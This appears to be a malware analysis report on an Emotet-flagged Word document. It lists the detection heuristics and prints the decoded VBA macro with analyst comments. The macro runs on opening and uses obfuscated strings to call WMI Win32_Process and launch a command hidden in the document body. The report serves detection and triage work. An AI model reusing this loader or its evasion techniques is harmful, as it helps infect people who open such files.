MALICIOUS
172
Risk Score
Heuristics 7
-
ClamAV: Doc.Downloader.EmotetRed0121-9822961-0 — critical — CLAMAV_DETECTION: ClamAV detected this file as malware: Doc.Downloader.EmotetRed0121-9822961-0
-
VBA macros detected — medium — 3 related findings — OLE_VBA_MACROS: Document contains VBA macro code
-
CreateObject call — high — OLE_VBA_CREATEOBJ: CreateObject call. Matched line in script:
Set Npx4o6ysnquo_vp = CreateObject(I05vk2km1xd81jo8) -
VBA p-code auto-exec with execution tokens — high — OLE_VBA_PCODE_AUTOEXEC_EXEC: Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Document_Open macro — low — OLE_VBA_DOCOPEN: Document_Open macro. Matched line in script:
Private Sub Document_open() -
Suspicious extracted artifact — info — EXTRACTED_FILE_STATIC_TRIAGE: One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL — info — EMBEDDED_URL: One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body). This is the standard DrawingML XML namespace identifier, so it should not be treated as a network indicator.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 13140 bytes |
SHA-256: 9b820b2402def2f5ee5a5a3a44ae4d03778e1b1e351b3b609e3682fdcff76601 |
|||
|
Detection
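ClamAV (scan of the extracted macros.bas only):
No threats found — this result is for the decoded macro text; the ClamAV detection listed under Heuristics is for the submitted document itself.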
Obfuscation or payload:
likely
119 of 191 identifiers look randomly generated (e.g. 'T_6bipqiz5umxjq9r6') — consistent with name-mangling obfuscation.
|
|||
Preview script: first 1,000 lines of the extracted script
Attribute VB_Name = "Gci_56o45gw"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
' Auto-execution entry point: this handler lives in the ThisDocument module
' (VB_Base "1Normal.ThisDocument" above), so Word runs it when the document is
' opened with macros enabled. Its only action is to call N6guhxeua4i79j, the
' function that builds an object name and calls that object's Create method.
N6guhxeua4i79j
End Sub
Attribute VB_Name = "I_jtotl9qzr"
Attribute VB_Name = "Tuem7y_4cvap"
' Main routine, reached from Document_open.
'
' Analyst summary (derived from the statements below):
'   1. Reads the document body text into V1.
'   2. Assembles a string from literal fragments padded with the filler
'      "sg yw ah", strips the filler via Rumvbdwr2xkslu7, and passes the
'      result to CreateObject.
'   3. Strips the same filler from the document text (from character 4
'      onward) and hands it to the created object's Create method.
'
' Every real statement is followed by "GoTo <label>" and a For Each loop over
' the document paragraphs. Because the GoTo jumps straight to the label placed
' after the loop, those loops never run; they reference names such as "saw"
' that are never assigned and appear to exist only as padding. The block is
' repeated with fresh random identifiers after each real statement.
Function N6guhxeua4i79j()
' Suppresses runtime errors for the whole routine, so a failed step does not
' surface an error dialog to the user.
On Error Resume Next
' Gci_56o45gw is the ThisDocument module (see its VB_Name attribute), so
' .Content is the document's main text. Ecl38z2wmq3yku and N9ulsoz7m8jctsqe are
' not assigned anywhere in the visible source; presumably they evaluate to
' empty values and V1 is just the body text.
V1 = Ecl38z2wmq3yku + Gci_56o45gw.Content + N9ulsoz7m8jctsqe
GoTo HWQvGoFE
' --- unreachable padding block (skipped by the GoTo above) ---
Dim KKHJBcAYE As Paragraph
Set stfuHfQc = JtPDWEB
For Each KKHJBcAYE In Gci_56o45gw.Paragraphs
Set tzJksCBJB = wEEdNs
If Left(KKHJBcAYE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HWQvGoFE = KKHJBcAYE.Range.ListFormat.ListString
ElseIf InStr(KKHJBcAYE.Range.Text, "kkiew") > 1 Then
bvwPF = KKHJBcAYE.Range.Text
bvwPF = Replace(saw, "sjgwb", "hqkwjbjdasd" & HWQvGoFE)
KKHJBcAYE.Range.Text = bvwPF
Set KKHJBcAYE.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set VqxJYDBE = PBlWmzBI
Next KKHJBcAYE
HWQvGoFE:
' Fragment: with the "sg yw ah" filler removed this is "p".
U7 = "sg yw ahpsg yw ah"
' Fragment: with the filler removed this is "rocess".
O0k180c4ait = "sg yw ahrosg yw ahsg yw ahcesg yw ahssg yw ahssg yw ahsg yw ah"
GoTo qIplW
' --- unreachable padding block ---
Dim rsJLI As Paragraph
Set GjurWEEJF = LCEyFiCH
For Each rsJLI In Gci_56o45gw.Paragraphs
Set lLMpOYHGF = ilYrjJGAJ
If Left(rsJLI.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
qIplW = rsJLI.Range.ListFormat.ListString
ElseIf InStr(rsJLI.Range.Text, "kkiew") > 1 Then
vClZy = rsJLI.Range.Text
vClZy = Replace(saw, "sjgwb", "hqkwjbjdasd" & qIplW)
rsJLI.Range.Text = vClZy
Set rsJLI.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set vVvxqHGrs = dycxOGB
Next rsJLI
qIplW:
' Fragment: with the filler removed this is ":win32_".
Eiw3em6pwe1 = "sg yw ah:wsg yw ahsg yw ahinsg yw ah3sg yw ah2sg yw ah_sg yw ah"
GoTo jvPhFGkeE
' --- unreachable padding block ---
Dim aTXZWf As Paragraph
Set yziTEHql = ADSJm
For Each aTXZWf In Gci_56o45gw.Paragraphs
Set fqOWEEXD = fmSIJH
If Left(aTXZWf.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jvPhFGkeE = aTXZWf.Range.ListFormat.ListString
ElseIf InStr(aTXZWf.Range.Text, "kkiew") > 1 Then
AOxzVepIB = aTXZWf.Range.Text
AOxzVepIB = Replace(saw, "sjgwb", "hqkwjbjdasd" & jvPhFGkeE)
aTXZWf.Range.Text = AOxzVepIB
Set aTXZWf.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set ZiVzJG = ylZdW
Next aTXZWf
jvPhFGkeE:
' Fragment: with the filler removed this is "winmgmt".
Jgiewrnpnwjl9ry = "wsg yw ahinsg yw ahmsg yw ahgmsg yw ahtsg yw ahsg yw ah"
GoTo lUqNfMjAH
' --- unreachable padding block ---
Dim tMzYO As Paragraph
Set drPyBCB = gJXnJN
For Each tMzYO In Gci_56o45gw.Paragraphs
Set OyrpGEGR = FTtCoDc
If Left(tMzYO.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
lUqNfMjAH = tMzYO.Range.ListFormat.ListString
ElseIf InStr(tMzYO.Range.Text, "kkiew") > 1 Then
qdSxpB = tMzYO.Range.Text
qdSxpB = Replace(saw, "sjgwb", "hqkwjbjdasd" & lUqNfMjAH)
tMzYO.Range.Text = qdSxpB
Set tMzYO.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set TuPkG = JXMIDL
Next tMzYO
lUqNfMjAH:
' Takes one character from the host application's name instead of using a
' literal: Mid(..., 3 + 3, 1 / 1) is the 6th character. If Application.Name is
' "Microsoft Word" that character is "s" - confirm against the host used for
' analysis. Keeping this letter out of the literals avoids a plain
' "winmgmts" string even after the filler is removed.
R1i4k8w1zg90 = "sg yw ahsg yw ah" + Mid(Application.Name, 3 + 3, 1 / 1) + "sg yw ahsg yw ah"
GoTo VoTfINbT
' --- unreachable padding block ---
Dim oZBJQq As Paragraph
Set FbBzB = RHzVDJuIO
For Each oZBJQq In Gci_56o45gw.Paragraphs
Set tHQgbISng = TOeEHSG
If Left(oZBJQq.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
VoTfINbT = oZBJQq.Range.ListFormat.ListString
ElseIf InStr(oZBJQq.Range.Text, "kkiew") > 1 Then
rnlgIs = oZBJQq.Range.Text
rnlgIs = Replace(saw, "sjgwb", "hqkwjbjdasd" & VoTfINbT)
oZBJQq.Range.Text = rnlgIs
Set oZBJQq.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set yUycfwFQH = cTCWAby
Next oZBJQq
VoTfINbT:
' Joins the fragments in the order that, once the filler is stripped, reads
' "winmgmt" + <6th char of Application.Name> + ":win32_" + "p" + "rocess",
' i.e. "winmgmts:win32_process" under the assumption noted above.
Xk8p_0a082jagmo = Jgiewrnpnwjl9ry + R1i4k8w1zg90 + Eiw3em6pwe1 + U7 + O0k180c4ait
GoTo ETZuAF
' --- unreachable padding block ---
Dim pQjOMaHL As Paragraph
Set sWybazB = iLtsGUA
For Each pQjOMaHL In Gci_56o45gw.Paragraphs
Set bJqZvJ = BGsYGjXjA
If Left(pQjOMaHL.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
ETZuAF = pQjOMaHL.Range.ListFormat.ListString
ElseIf InStr(pQjOMaHL.Range.Text, "kkiew") > 1 Then
nKoHLZB = pQjOMaHL.Range.Text
nKoHLZB = Replace(saw, "sjgwb", "hqkwjbjdasd" & ETZuAF)
pQjOMaHL.Range.Text = nKoHLZB
Set pQjOMaHL.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set WUJvDAEC = xZClD
Next pQjOMaHL
ETZuAF:
' Strips the "sg yw ah" filler from the assembled string (see Rumvbdwr2xkslu7).
I05vk2km1xd81jo8 = Rumvbdwr2xkslu7(Xk8p_0a082jagmo)
GoTo gemtRJp
' --- unreachable padding block ---
Dim dNESDo As Paragraph
Set eQUuFDru = PKZwD
For Each dNESDo In Gci_56o45gw.Paragraphs
Set bWlCEGQ = zFFKL
If Left(dNESDo.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
gemtRJp = dNESDo.Range.ListFormat.ListString
ElseIf InStr(dNESDo.Range.Text, "kkiew") > 1 Then
eCzcG = dNESDo.Range.Text
eCzcG = Replace(saw, "sjgwb", "hqkwjbjdasd" & gemtRJp)
dNESDo.Range.Text = eCzcG
Set dNESDo.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set SCztLE = ifuqBj
Next dNESDo
gemtRJp:
' This is the line the report's OLE_VBA_CREATEOBJ heuristic matched. The
' object name is only known at run time, so a static search of the macro for
' "winmgmts" or "Win32_Process" finds nothing.
Set Npx4o6ysnquo_vp = CreateObject(I05vk2km1xd81jo8)
GoTo UxOde
' --- unreachable padding block ---
Dim odRwCEQ As Paragraph
Set GJznGAzC = kmGnE
For Each odRwCEQ In Gci_56o45gw.Paragraphs
Set fIRXnM = yKsempluE
If Left(odRwCEQ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
UxOde = odRwCEQ.Range.ListFormat.ListString
ElseIf InStr(odRwCEQ.Range.Text, "kkiew") > 1 Then
kCnsZK = odRwCEQ.Range.Text
kCnsZK = Replace(saw, "sjgwb", "hqkwjbjdasd" & UxOde)
odRwCEQ.Range.Text = kCnsZK
Set odRwCEQ.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set zjUfD = PEsXNwb
Next odRwCEQ
UxOde:
' Takes the document text from character 4 onward and strips the filler from
' it. The resulting string is not present in the macro source: it is stored in
' the document body, so macro-only extraction (as in this preview) does not
' show what is launched. Recover it from the document text during triage.
KK = Rumvbdwr2xkslu7(Mid(V1, (4), Len(V1)))
' Calls Create on the object with KK as first argument. If the object is the
' WMI Win32_Process class as decoded above, this starts a process with KK as
' its command line; such a process is typically created by the WMI provider
' host rather than as a child of Word, which matters for parent/child-process
' detections. Z3yb8jsnr_7n and Gm7cs_w3sw295f are not assigned anywhere in the
' visible source.
Npx4o6ysnquo_vp.Create KK, Z3yb8jsnr_7n, Gm7cs_w3sw295f
GoTo Vqihh
' --- unreachable padding block ---
Dim ZTFizFGF As Paragraph
Set fjHRGQG = ngJGWB
For Each ZTFizFGF In Gci_56o45gw.Paragraphs
Set KiGeQBpA = hKGII
If Left(ZTFizFGF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
Vqihh = ZTFizFGF.Range.ListFormat.ListString
ElseIf InStr(ZTFizFGF.Range.Text, "kkiew") > 1 Then
YWLTZylNX = ZTFizFGF.Range.Text
YWLTZylNX = Replace(saw, "sjgwb", "hqkwjbjdasd" & Vqihh)
ZTFizFGF.Range.Text = YWLTZylNX
Set ZTFizFGF.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set GfGjAzGeR = awNaP
Next ZTFizFGF
Vqihh:
End Function
' Pass-through wrapper around Np0p7c9zsmfxy.
'
' Parameter: Ao_3muwgh5wnf6u4 - the filler-padded string to clean.
' Returns:   whatever Np0p7c9zsmfxy returns for that string (the input with
'            the "sg yw ah" filler replaced).
'
' The three real statements are a copy, a call and the return assignment; the
' extra indirection adds nothing functionally. Each is followed by a GoTo that
' skips an unreachable For Each padding block, as in N6guhxeua4i79j.
Function Rumvbdwr2xkslu7(Ao_3muwgh5wnf6u4)
' Suppresses runtime errors inside this helper.
On Error Resume Next
GoTo RTasDY
' --- unreachable padding block (skipped by the GoTo above) ---
Dim zKaCwWFDJ As Paragraph
Set oEgsJiJ = OxXuIIFB
For Each zKaCwWFDJ In Gci_56o45gw.Paragraphs
Set AcZWjDIqE = BGEICNVJF
If Left(zKaCwWFDJ.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
RTasDY = zKaCwWFDJ.Range.ListFormat.ListString
ElseIf InStr(zKaCwWFDJ.Range.Text, "kkiew") > 1 Then
qrLQOF = zKaCwWFDJ.Range.Text
qrLQOF = Replace(saw, "sjgwb", "hqkwjbjdasd" & RTasDY)
zKaCwWFDJ.Range.Text = qrLQOF
Set zKaCwWFDJ.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set adZlYEtAI = NAYLFd
Next zKaCwWFDJ
RTasDY:
' Copies the argument into a local variable.
T_6bipqiz5umxjq9r6 = Ao_3muwgh5wnf6u4
GoTo oehBfBH
' --- unreachable padding block ---
Dim tlCMF As Paragraph
Set HHcTAXdJD = bbhzkBgF
For Each tlCMF In Gci_56o45gw.Paragraphs
Set rQSGXCCJm = QfPpIYDWH
If Left(tlCMF.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
oehBfBH = tlCMF.Range.ListFormat.ListString
ElseIf InStr(tlCMF.Range.Text, "kkiew") > 1 Then
GzKUJ = tlCMF.Range.Text
GzKUJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & oehBfBH)
tlCMF.Range.Text = GzKUJ
Set tlCMF.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set vevRJEC = gjqnBy
Next tlCMF
oehBfBH:
' The actual filler removal happens in Np0p7c9zsmfxy.
Y8jzmv5sdtytsh = Np0p7c9zsmfxy(T_6bipqiz5umxjq9r6)
GoTo PKQbOAp
' --- unreachable padding block ---
Dim ERcyoJoAE As Paragraph
Set CZPcl = REKxGJ
For Each ERcyoJoAE In Gci_56o45gw.Paragraphs
Set NPyBQGAGX = KbqQGKcAI
If Left(ERcyoJoAE.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
PKQbOAp = ERcyoJoAE.Range.ListFormat.ListString
ElseIf InStr(ERcyoJoAE.Range.Text, "kkiew") > 1 Then
jxnEAUKC = ERcyoJoAE.Range.Text
jxnEAUKC = Replace(saw, "sjgwb", "hqkwjbjdasd" & PKQbOAp)
ERcyoJoAE.Range.Text = jxnEAUKC
Set ERcyoJoAE.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set EhOCBCJ = acBgFwZ
Next ERcyoJoAE
PKQbOAp:
' Assigning to the function name sets the return value.
Rumvbdwr2xkslu7 = Y8jzmv5sdtytsh
GoTo HvniGCa
' --- unreachable padding block ---
Dim vwBGxB As Paragraph
Set WSWeHw = okTyBh
For Each vwBGxB In Gci_56o45gw.Paragraphs
Set AyYHGdG = tJdPJH
If Left(vwBGxB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
HvniGCa = vwBGxB.Range.ListFormat.ListString
ElseIf InStr(vwBGxB.Range.Text, "kkiew") > 1 Then
lzgdCVJ = vwBGxB.Range.Text
lzgdCVJ = Replace(saw, "sjgwb", "hqkwjbjdasd" & HvniGCa)
vwBGxB.Range.Text = lzgdCVJ
Set vwBGxB.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set NrYDKHEG = RiNMFj
Next vwBGxB
HvniGCa:
End Function
' String de-obfuscation helper: removes the filler token from a string.
'
' Parameter: Cmig6whzurbqi - the filler-padded string.
' Returns:   the input with every "sg yw ah" replaced by Bncek5vd5c0yonu_.
'
' The function contains a single real statement (the Replace call). Everything
' else is a chain of GoTo jumps over unreachable For Each padding blocks, the
' same pattern used in the other two functions. The filler token "sg yw ah" is
' a fixed literal in this sample and is the key needed to decode both the
' macro's string fragments and the text stored in the document body.
Function Np0p7c9zsmfxy(Cmig6whzurbqi)
GoTo jAVABQF
' --- unreachable padding block (skipped by the GoTo above) ---
Dim JNfkj As Paragraph
Set tgjhdsf = BMbIJGHTD
For Each JNfkj In Gci_56o45gw.Paragraphs
Set ZFLxDGb = XICZyC
If Left(JNfkj.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
jAVABQF = JNfkj.Range.ListFormat.ListString
ElseIf InStr(JNfkj.Range.Text, "kkiew") > 1 Then
XJSiBs = JNfkj.Range.Text
XJSiBs = Replace(saw, "sjgwb", "hqkwjbjdasd" & jAVABQF)
JNfkj.Range.Text = XJSiBs
Set JNfkj.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set JakAh = JdFEHBDi
Next JNfkj
jAVABQF:
GoTo TXaZBF
' --- unreachable padding block ---
Dim AhDZB As Paragraph
Set njcretF = vJkKCGAeq
For Each AhDZB In Gci_56o45gw.Paragraphs
Set NwftnNXBA = gPbBFsGHn
If Left(AhDZB.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
TXaZBF = AhDZB.Range.ListFormat.ListString
ElseIf InStr(AhDZB.Range.Text, "kkiew") > 1 Then
yHrsJGLG = AhDZB.Range.Text
yHrsJGLG = Replace(saw, "sjgwb", "hqkwjbjdasd" & TXaZBF)
AhDZB.Range.Text = yHrsJGLG
Set AhDZB.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set DnLpUBDr = WXFEKIE
Next AhDZB
TXaZBF:
GoTo efUjA
' --- unreachable padding block ---
Dim bqQxcLA As Paragraph
Set ZXaEIG = pcgpnTx
For Each bqQxcLA In Gci_56o45gw.Paragraphs
Set AdWGIbTH = LMWQBR
If Left(bqQxcLA.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
efUjA = bqQxcLA.Range.ListFormat.ListString
ElseIf InStr(bqQxcLA.Range.Text, "kkiew") > 1 Then
UsEUVHGv = bqQxcLA.Range.Text
UsEUVHGv = Replace(saw, "sjgwb", "hqkwjbjdasd" & efUjA)
bqQxcLA.Range.Text = UsEUVHGv
Set bqQxcLA.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set DOKqFG = EYpZv
Next bqQxcLA
efUjA:
' The only functional statement. Bncek5vd5c0yonu_ is not assigned anywhere in
' the visible source; presumably it is an uninitialised value that acts as an
' empty string, so the filler is simply deleted - confirm by running the
' equivalent replacement in an analysis tool rather than in Word.
Np0p7c9zsmfxy = Replace(Cmig6whzurbqi, "sg yw ah", Bncek5vd5c0yonu_)
GoTo NZgEl
' --- unreachable padding block ---
Dim SymDGBcJj As Paragraph
Set MkjIIE = DhTOiFICG
For Each SymDGBcJj In Gci_56o45gw.Paragraphs
Set xYdYH = OmJyG
If Left(SymDGBcJj.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NZgEl = SymDGBcJj.Range.ListFormat.ListString
ElseIf InStr(SymDGBcJj.Range.Text, "kkiew") > 1 Then
CwagDCA = SymDGBcJj.Range.Text
CwagDCA = Replace(saw, "sjgwb", "hqkwjbjdasd" & NZgEl)
SymDGBcJj.Range.Text = CwagDCA
Set SymDGBcJj.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set hbAEBk = AlCbBP
Next SymDGBcJj
NZgEl:
GoTo UdnxDGCD
' --- unreachable padding block ---
Dim tbKDM As Paragraph
Set tyXuGC = lxSOEGF
For Each tbKDM In Gci_56o45gw.Paragraphs
Set GcHmC = zQQpBQ
If Left(tbKDM.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
UdnxDGCD = tbKDM.Range.ListFormat.ListString
ElseIf InStr(tbKDM.Range.Text, "kkiew") > 1 Then
xDmOKFAr = tbKDM.Range.Text
xDmOKFAr = Replace(saw, "sjgwb", "hqkwjbjdasd" & UdnxDGCD)
tbKDM.Range.Text = xDmOKFAr
Set tbKDM.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set IFzjGXkh = SAPOJDZpI
Next tbKDM
UdnxDGCD:
GoTo NbelBt
' --- unreachable padding block ---
Dim yZgdJvVP As Paragraph
Set iRLMFIi = LILWAWn
For Each yZgdJvVP In Gci_56o45gw.Paragraphs
Set XxBDn = OGfYn
If Left(yZgdJvVP.Range.ParagraphStyle, Len("xxx")) = "xxxx" Then
NbelBt = yZgdJvVP.Range.ListFormat.ListString
ElseIf InStr(yZgdJvVP.Range.Text, "kkiew") > 1 Then
lgLREAA = yZgdJvVP.Range.Text
lgLREAA = Replace(saw, "sjgwb", "hqkwjbjdasd" & NbelBt)
yZgdJvVP.Range.Text = lgLREAA
Set yZgdJvVP.Range.ParagraphStyle = Gci_56o45gw.Styles("Normal")
End If
Set HDpxEFk = XTsuJJ
Next yZgdJvVP
NbelBt:
End Function
|
|||